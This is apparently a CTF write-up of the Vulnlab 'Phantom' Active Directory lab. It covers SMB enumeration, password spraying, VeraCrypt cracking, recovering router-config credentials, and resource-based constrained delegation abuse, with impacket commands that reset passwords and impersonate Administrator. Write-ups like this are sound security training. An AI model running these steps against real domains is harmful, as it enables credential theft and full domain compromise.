CTF-Writeups/Vulnlab/Phantom.md

Vulnlab - Phantom

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?        
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped                               
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services

Enumerating smb shares with anonymous login

From the public share, we have tech support mail file

Which has a base64 encoded pdf file

After decoding it from base64, we'll get a password from this file

We don't have a username yet, so bruteforcing SIDs for the username using lookupsid from impacket

Spraying the password on all these users, only ibryant will be the account that has this password set

After logging onto Departments Share , there's a backup file in the IT folder

The .hc extension tells that it's file from veracrypt software, as the name tells it encrypts data, this password can be cracked with hashcat but it wasn't present in rockyou.txt, so generating a custom wordlist, with company name, year and a special character as mention in the hint from vulnlab wiki

Mounting the image with veracrypt

There's a vyos backup file, which is an open source OS for router and firewall, from the config file, we can retreive the password for lstanely

Which didn't worked but we can spary this password against the list of domain users that we have

This user can login through winrm

Enumerating the domain with bloodhound, we can change password for domain users with ForceChangePassword

These users belong to ICT Security group which have AddAllowedToAct on domain controller, through this we can edit msDS-AllowedToActOnBehalfOfOtherIdentity to add a machine account in this property to perform Resource Based Constrained Delegation (RBCD), with net rpc password can be changed

net rpc password WSILVA -U phantom.vl/svc_sspr -S dc.phantom.vl

Editing the msDS-AllowedToActOnBehalfOfOtherIdentity property

rbcd.py -delegate-to 'DC$' -delegate-from 'WSILVA' -dc-ip 10.10.118.204 -action 'write' 'phantom.vl'/'WSILVA':'Phantom2023!'

To abuse RBCD, we need to first know the status of machine qouta in order to create a machine account and then add to DC's property but qouta is set to 0

However we can still perform RBCD through a normal domain user, for this we need a modified branch of getST with U2U kerberos extension https://github.com/ShutdownRepo/impacket/tree/getST

Frist retrieving TGT with overpass-the-hash, extracting the TGT session key and replacing it with the domain user's NTHash

With S4U2Self and U2U, with WSILVA we can obtain a service ticket to itself on behalf of administrator and then proceed to S4U2proxy to obtain a service ticket to the target the user can delegate to.

KRB5CCNAME=./WSILVA.ccache getST.py -u2u -impersonate "Administrator" -spn "host/dc.phantom.vl" -k -no-pass phantom.vl/WSILVA

References

• https://github.com/lvaccaro/truecrack
• https://codeonby.com/2022/01/19/brute-force-veracrypt-encryption/
• https://www.thehacker.recipes/a-d/movement/kerberos/delegations/rbcd
• https://github.com/ShutdownRepo/impacket/tree/getST
• https://github.com/GhostPack/Rubeus/pull/137